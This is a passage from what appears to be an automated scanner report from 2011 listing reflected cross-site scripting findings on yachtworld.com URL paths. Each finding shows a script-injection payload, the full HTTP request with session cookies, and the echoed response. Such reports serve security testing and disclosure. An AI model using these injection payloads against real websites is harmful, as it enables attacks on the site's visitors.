<a href="/boats/category/type/Chris+Craft4247a"><a>354e0610b4d/A-1">
...[SNIP]...

3.223. http://www.yachtworld.com/boats/category/type/Chris+Craft/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Chris+Craft/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e86da"><script>alert(1)</script>b315ff50f5a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Chris+Craft/1e86da"><script>alert(1)</script>b315ff50f5a HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:55 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Chris+Craft/1e86da"><script>alert(1)</script>b315ff50f5a/A-1">
...[SNIP]...

3.224. http://www.yachtworld.com/boats/category/type/Chris-craft/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Chris-craft/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a4a"><script>alert(1)</script>6b7c846faf0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type17a4a"><script>alert(1)</script>6b7c846faf0/Chris-craft/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:42 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type17a4a"><script>alert(1)</script>6b7c846faf0/260+Cruiser">
...[SNIP]...

3.225. http://www.yachtworld.com/boats/category/type/Chris-craft/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Chris-craft/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69ab4"><a>0fc5744d2ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Chris-craft69ab4"><a>0fc5744d2ac/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:45 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Chris-craft69ab4"><a>0fc5744d2ac/A-1">
...[SNIP]...

3.226. http://www.yachtworld.com/boats/category/type/Chris-craft/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Chris-craft/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a932"><script>alert(1)</script>16033f1ffad was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Chris-craft/13a932"><script>alert(1)</script>16033f1ffad HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:00 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Chris-craft/13a932"><script>alert(1)</script>16033f1ffad/A-1">
...[SNIP]...

3.227. http://www.yachtworld.com/boats/category/type/Cruisers/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Cruisers/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed92"><a>17ba13e29c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typebed92"><a>17ba13e29c/Cruisers/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:59 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typebed92"><a>17ba13e29c/Cruisers/1">
...[SNIP]...

3.228. http://www.yachtworld.com/boats/category/type/Cruisers/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Cruisers/1

Issue detail

